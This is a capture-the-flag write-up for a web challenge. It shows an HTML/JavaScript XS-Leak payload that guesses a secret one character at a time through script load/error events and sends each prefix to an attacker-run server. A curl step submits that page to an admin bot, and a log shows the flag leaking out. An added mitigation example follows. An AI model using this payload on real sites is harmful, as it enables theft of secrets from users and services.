Diefunction

SOC Complaints


Last updated 2 years ago


IPAddress: 172.20.0.4
Port: 80
URL:

Description

If you cannot access a website, complain to the SOC team, then the SOC team will investigate.

Structure

.
├── app.js
├── config
│   └── cors.js
├── controllers
│   ├── complaints.js
│   └── manage.js
├── middlewares
│   └── error.js
├── package.json
├── routes
│   ├── complaints.js
│   └── manage.js
├── utils
│   ├── browser.js
│   └── database.js
└── views

Solution

Exploit

Attacker IPAddress

ip addr show docker0
6: docker0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:40:01:c8:b5 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:40ff:fe01:c8b5/64 scope link 
       valid_lft forever preferred_lft forever

IPv4: 172.17.0.1

Start a web server on the Docker interface with Python

python3 -m http.server 80 -b 172.17.0.1

Content of index.html

<html>
    <head>
        <title>EXPLOIT</title>
    </head>
    <body>
        <script>
            var alphabets = ' !"#$&\'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^`{|}~';
            var counter = 0;
            var secret = '';

            probeError = (url) => {
                let script = document.createElement('script');
                script.src = url;
                script.onload = async () => { 
                    secret = decodeURIComponent(url.split('?')[1].split('&')[1].split('=')[1]);
                    await fetch(`http://172.17.0.1/${secret}`);
                    counter = 0;
                    
                    probeError(`http://SOCComplaints/api/v1/manage/secrets?application=SOCComplaints&secret=${encodeURIComponent(secret + alphabets.charAt(counter))}`);
                };
                script.onerror = () => {
                    counter = counter + 1;
                    probeError(`http://SOCComplaints/api/v1/manage/secrets?application=SOCComplaints&secret=${encodeURIComponent(secret + alphabets.charAt(counter))}`);
                };
                document.head.appendChild(script);
            }
            probeError(`http://SOCComplaints/api/v1/manage/secrets?application=SOCComplaints&secret=${encodeURIComponent(secret + alphabets.charAt(counter))}`);

        </script>
    </body>
</html>

Phish the SOC team

curl -X POST -H 'Content-type: application/json' -d '{"url": "http://172.17.0.1/"}' http://172.20.0.4/api/v1/complaints/
{"message":"your request was successfully submitted"}

Flag

└─$ python3 -m http.server 80 -b 172.17.0.1
Serving HTTP on 172.17.0.1 port 80 (http://172.17.0.1:80/) ...
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET / HTTP/1.1" 200 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /T HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /TC HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /TCC HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:18] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:18] "GET /TCC%7B HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5- HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S- HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0 HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T- HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T-E HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:19] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:19] "GET /TCC%7BC0R5-1S-N0T-EN HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENO HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOU HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOUG HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOUGH HTTP/1.1" 404 -
172.20.0.4 - - [21/Nov/2022 13:59:20] code 404, message File not found
172.20.0.4 - - [21/Nov/2022 13:59:20] "GET /TCC%7BC0R5-1S-N0T-ENOUGH%7D HTTP/1.1" 404 -

Explanation

http://172.20.0.4/
Error Events
Leaky Images: Targeted Privacy Attacks in the Web
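
The flag's message is that CORS only stops a page from reading a cross-origin response; the load/error event of a `<script>` include still reveals whether the request succeeded. The following is an added example, not code from the challenge or the original writeup, of a server-side mitigation: a Fetch Metadata resource isolation policy plus `Cross-Origin-Resource-Policy` and `nosniff` headers. The names `lookupStatus`, `isolationVerdict`, `handle`, `scriptEvent` and `observe` are hypothetical, the stored value is constructed, and the 200-versus-404 behaviour of the lookup is an assumption.

```javascript
// Added example. Constructed stand-in for the secrets lookup; ASSUMED to
// answer 200 when the guess is a prefix of the stored value and 404 otherwise.
const STORED = 'CONSTRUCTED-SECRET';
const lookupStatus = (guess) => (STORED.startsWith(guess) ? 200 : 404);

// Resource isolation policy driven by Fetch Metadata request headers.
function isolationVerdict(headers) {
  const site = headers['sec-fetch-site'];
  if (headers['sec-fetch-dest'] === 'script') return 'deny'; // a JSON API is never a script source
  if (site === undefined) return 'allow'; // non-browser or legacy client: no metadata sent
  return site === 'same-origin' || site === 'none' ? 'allow' : 'deny';
}

// The verdict is taken before the secret is compared, so a denied request
// gets the same response whatever the guess was.
function handle(req, hardened) {
  const headers = { 'content-type': 'application/json' };
  if (hardened) {
    headers['cross-origin-resource-policy'] = 'same-origin';
    headers['x-content-type-options'] = 'nosniff';
    if (isolationVerdict(req.headers) === 'deny') return { status: 403, headers };
  }
  return { status: lookupStatus(req.guess), headers };
}

// Simplified model of the event a cross-origin <script> element fires:
// "load" only for a 2xx response the browser does not block.
function scriptEvent(res) {
  const h = res.headers;
  const corpBlocked = h['cross-origin-resource-policy'] === 'same-origin';
  const sniffBlocked = h['x-content-type-options'] === 'nosniff'
    && !/javascript/.test(h['content-type']);
  const ok = res.status >= 200 && res.status < 300;
  return ok && !corpBlocked && !sniffBlocked ? 'load' : 'error';
}

// What the page embedding the script can tell apart for a given guess.
function observe(guess, hardened) {
  const headers = { 'sec-fetch-site': 'cross-site', 'sec-fetch-mode': 'no-cors', 'sec-fetch-dest': 'script' };
  return scriptEvent(handle({ guess, headers }, hardened));
}

for (const hardened of [false, true]) {
  console.log(hardened ? 'hardened' : 'baseline', observe('CON', hardened), observe('XYZ', hardened));
}
```

In an Express app the same verdict would run as middleware ahead of the route; requests without Fetch Metadata headers still need the application's normal authentication, since the policy lets them through.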